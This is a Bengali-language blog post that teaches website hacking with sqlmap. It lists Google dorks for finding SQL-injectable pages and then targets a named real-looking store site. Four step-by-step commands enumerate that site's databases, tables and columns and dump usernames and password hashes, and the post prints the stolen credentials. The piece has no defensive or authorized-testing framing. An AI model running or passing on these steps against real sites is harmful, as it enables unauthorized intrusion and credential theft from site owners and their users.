WD

WD

SQLMAP

কালি & ব্যাকট্রেক-৫ লিনাক্সে sqlmap দিয়ে ওয়েব সাইট হ্যাকিং

আসসালামুয়ালাইকুম,আশা করি সবাই ভালো আছেন ।

শিরোনাম দেখেই সবাই বুঝে গেছেন এটা লিনাক্স বিষয়ক পোস্ট ।
আমিও নিজেও লিনাক্সের নতুন ইউজার । যা শিখেছি তা আপনাদের সাথে শেয়ার করছি ।
আজকে আমি দেখাবো কি ভাবে sqlmap এর মাধ্যমে কোন সাইটের ইউজার নেম & পাসওয়ার্ড বার করা যায় ।
প্রথমে SQL INJECT করার জন্য আমাদের ভার্নাবল সাইট খুজতে হবে। এর জন্য আমরা dork use করব !

trainers.php?id=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
এখানে ২০১৪ সালের অনেক dork আছে sql ভার্নাবল সাইট খুজার জন্য ।

http://pastebin.com/5hv980yX

প্রথম এ একটা dork নিয়ে আমরা www.google.com এ SEARCH দিব !

dork দিয়ে সার্চ দিয়ে অনেক সাইট পাবেন তারমধ্যে জে কোন একটি নিন । যেমন আমি একটা সাইট নিলাম

www.intercodocks.ca/store/products.php?id=6

এখন আমরা দেখবো সাইট টি injectable কিনা ।
এর জন্য আমাদের url এর শেষে একটি ‘ বসাতে হবে ।

http://www.intercodocks.ca/store/products.php?id=6'
যদি ডাটাবেজের কিছু মিসিং আসে বা পেজের কিছু ইরর আসে তাহলে বুঝবেন সাইট টি injectable ।
যেমন : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″

ছবিঃ http://postimg.org/image/jfj06m6k9/

এখন SqlMap ওপেন করি Application > Kali Linux > Top 10 Security Tools > sqlmap .
এখন কমান্ড দেয়ার পালা...

প্রথম কমান্ড :sqlmap -u ভার্নাবল সাইট --dbs

তাহলে কমান্ড দাড়ায় : sqlmap -u www.intercodocks.ca/store/products.php?id=6 --dbs

ছবি : http://postimg.org/image/60pphy9sr/

এই কমান্ডের ফলে আমরা সাইটের ডাটাবেজ পাইলাম ।
[*] bestwest_store
[*] information_schema

আমাদের কাজ হচ্ছে bestwest_store ডাটাবেজ নিয়ে । information_schema ডাটাবেজে আমাদের কোন কাজ নেই ।

ছবি: http://postimg.org/image/bvv7hb6r5/

এবার সাইটের টেবিল বার করার জন্য কমান্ড দিবো ।

দ্বিতীয় কমান্ড :sqlmap -u ভার্নাবল সাইট -D ডাটাবেজ --tables

তাহলে কমান্ড দাড়ায় : sqlmap -u www.intercodocks.ca/store/products.php?id=6 -D bestwest_store --tables

ছবি : http://postimg.org/image/ihfd7y5ql/

এই কমান্ডের ফলে আমরা সাইটের টেবিল পাইলাম
+----------------------------+
| auth_log |
| s_categories |
| s_customers |
| s_orders |
| s_product_attribute_groups |
| s_product_attributes |
| s_products |
| s_saved_carts |
| settings |
| users |
+----------------------------+

ছবি : http://postimg.org/image/za43kqqwf/

এখন আমাদের কাজ হচ্ছে users টেবিল নিয়ে ।
users টেবিলের কলাম বার করার জন্য এখন আমরা কমান্ড দিবো ।

তৃতীয় কমান্ড : sqlmap -u ভার্নাবল সাইট -D bestwest_store -T users --columns

তাহলে কমান্ড দাড়ায় : sqlmap -u www.intercodocks.ca/store/products.php?id=6 -D bestwest_store -T users --columns

ছবি : http://postimg.org/image/a8jzjvxa1/

এই কমান্ডের ফলে আমরা সাইটের কলাম গুলা পাইলাম
+--------------------+-----------+
| Column | Type |
+--------------------+-----------+
| active | char(2) |
| admin | char(2) |
| admin_user_manager | char(2) |
| email | char(255) |
| first_name | char(80) |
| id | int(11) |
| last_name | char(80) |
| password | char(255) |
| phone | char(15) |
| time_out | int(11) |
| username | char(80) |
+--------------------+-----------+

ছবি : http://postimg.org/image/lja6pm6nj/

এখন আমরা শেষ পর্যায়ে । এখন আমরা username & password বের করার জন্য কমান্ড দিব।

চতুর্থ কমান্ড : sqlmap -u ভার্নাবল সাইট -D bestwest_store -T users -C username,password --dump

তাহলে কমান্ড দাড়ায় :sqlmap -u www.intercodocks.ca/store/products.php?id=6 -D bestwest_store -T users
-C username,password --dump
ছবি: http://postimg.org/image/y3t5p9z65/
এই কমান্ডের ফলে আমরা সাইটের username & password পেয়ে গেলাম ।
+----------+----------------------------------+
| username | password |
+----------+----------------------------------+
| root | aa371e9827ae8dbd3ada5f7da30558e5 |
| root | aa371e9827ae8dbd3ada5f7da30558e5 |
| jcraft | oc3NmNuemqc= |
| jcraft | oc3NmNuemqc= |
| mlajoie | psrPZpaW0Q== |
| mlajoie | psrPZpaW0Q== |
| amanda | mtPVZphl |
| amanda | mtPVZphl |
| h474x | ypacZNs= |
| h474x | ypacZNs= |
+----------+----------------------------------+
ছবি : http://postimg.org/image/4xjscszjn

No comments:

Post a Comment